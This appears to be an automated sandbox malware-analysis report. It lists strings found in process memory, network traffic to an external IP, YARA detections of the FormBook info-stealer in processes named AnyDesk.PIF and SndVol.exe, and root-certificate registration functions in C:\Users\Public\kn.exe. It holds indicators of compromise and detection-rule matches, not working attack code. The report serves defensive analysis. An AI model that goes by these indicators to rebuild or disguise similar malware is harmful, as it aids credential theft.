          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
          Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
          Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
          Source: kn.exeString found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
          Source: explorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
          Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
          Source: kn.exe, 00000007.00000002.1429457981.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000007.00000000.1425526307.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000000.1434200373.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe, 00000009.00000002.1442396876.00007FF68552E000.00000002.00000001.01000000.00000005.sdmp, kn.exe.5.drString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
          Source: kn.exeString found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
          Source: explorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
          Source: explorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
          Source: AnyDesk.PIF, 0000000A.00000002.1577156534.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, AnyDesk.PIF, 0000000A.00000003.1503159656.000000007ECE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
          Source: explorer.exe, 00000012.00000003.3077399807.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3879092352.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2285822156.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
          Source: explorer.exe, 00000012.00000002.3879092352.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1558998492.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
          Source: explorer.exe, 00000012.00000003.2285406774.0000000006F30000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3870998046.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.3076946708.0000000006F33000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.1542764819.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownHTTPS traffic detected: 185.102.77.43:443 -> 192.168.2.8:49706 version: TLS 1.2

          E-Banking Fraud

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3864799596.0000000004BC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000014.00000002.3864480544.00000000032E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.1556875189.0000000021E40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
          Registers a new ROOT certificate
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68546B684 CertCompareCertificateName,#357,#357,CertEnumCertificatesInStore,CertCompareCertificateName,CertComparePublicKeyInfo,memcmp,#357,CertEnumCertificatesInStore,#357,CertFreeCertificateContext,CertAddCertificateContextToStore,GetLastError,7_2_00007FF68546B684
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854725E8 #357,#357,#357,CryptImportKey,GetLastError,#358,#357,CryptSetKeyParam,LocalFree,GetLastError,#357,#357,#357,CertFreeCertificateContext,CryptDestroyKey,7_2_00007FF6854725E8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854EA740 CryptAcquireContextW,GetLastError,#357,CryptImportKey,GetLastError,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,CryptGetUserKey,GetLastError,CryptDestroyKey,#357,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854EA740
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854AE1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,7_2_00007FF6854AE1F8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E6EA8 NCryptImportKey,#360,7_2_00007FF6854E6EA8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B0EF4 NCryptImportKey,#205,#359,#359,#357,7_2_00007FF6854B0EF4
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A0F58 CertAddEncodedCertificateToStore,GetLastError,#357,UuidCreate,StringFromCLSID,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,CertSetCTLContextProperty,GetLastError,CryptDestroyKey,CryptReleaseContext,CoTaskMemFree,CertFreeCertificateContext,7_2_00007FF6854A0F58
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68549EA7C #357,#357,LocalAlloc,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptImportKey,GetLastError,CryptSetKeyParam,GetLastError,CryptSetKeyParam,GetLastError,CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,CryptSetKeyParam,GetLastError,#357,LocalFree,LocalFree,LocalFree,CryptDestroyHash,CryptDestroyHash,7_2_00007FF68549EA7C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854729A0 #357,#357,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CertFreeCertificateContext,CryptReleaseContext,LocalFree,LocalFree,CryptDestroyKey,7_2_00007FF6854729A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E98B0 #357,CryptImportPublicKeyInfo,GetLastError,#357,CryptGenKey,GetLastError,CryptGenRandom,GetLastError,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,CryptImportKey,GetLastError,#357,memcmp,#357,CryptDestroyKey,CryptDestroyKey,CryptDestroyKey,LocalFree,LocalFree,LocalFree,CryptReleaseContext,7_2_00007FF6854E98B0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854A184C CryptCreateHash,GetLastError,CryptHashData,GetLastError,CryptGetHashParam,GetLastError,memset,CryptGetUserKey,GetLastError,CryptGetUserKey,GetLastError,#357,CryptImportKey,GetLastError,CryptDecrypt,GetLastError,GetLastError,#357,CryptDestroyKey,CryptDestroyHash,LocalFree,CryptDestroyKey,GetLastError,#357,LocalFree,7_2_00007FF6854A184C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854E93A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,7_2_00007FF6854E93A0
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF6854B342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,7_2_00007FF6854B342C
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68543F9B8 strcmp,#357,#359,NCryptOpenStorageProvider,#357,NCryptImportKey,#357,NCryptSetProperty,NCryptFinalizeKey,NCryptFreeObject,NCryptFreeObject,#359,CryptImportPKCS8,GetLastError,#357,CryptGetUserKey,GetLastError,#357,CryptGetUserKey,GetLastError,CryptDestroyKey,CryptReleaseContext,LocalFree,7_2_00007FF68543F9B8
          Source: C:\Users\Public\kn.exeCode function: 7_2_00007FF68544FC20 #359,#357,NCryptOpenStorageProvider,#357,NCryptImportKey,GetLastError,#357,#357,LocalFree,LocalFree,NCryptFreeObject,#357,NCryptFreeObject,#357,7_2_00007FF68544FC20

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.SndVol.exe.4990000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.AnyDesk.PIF.21e40000.7.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 10.2.AnyDesk.PIF.21e40000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 17.2.SndVol.exe.4990000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1625529389.0000000004990000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000A.00000002.1554023266.0000000021B34000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1653022588.00000000346B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.3863432255.0000000000E80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
          Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.1653057564.00000000346E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000A.00000002.1556634906.0000000021DE1000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
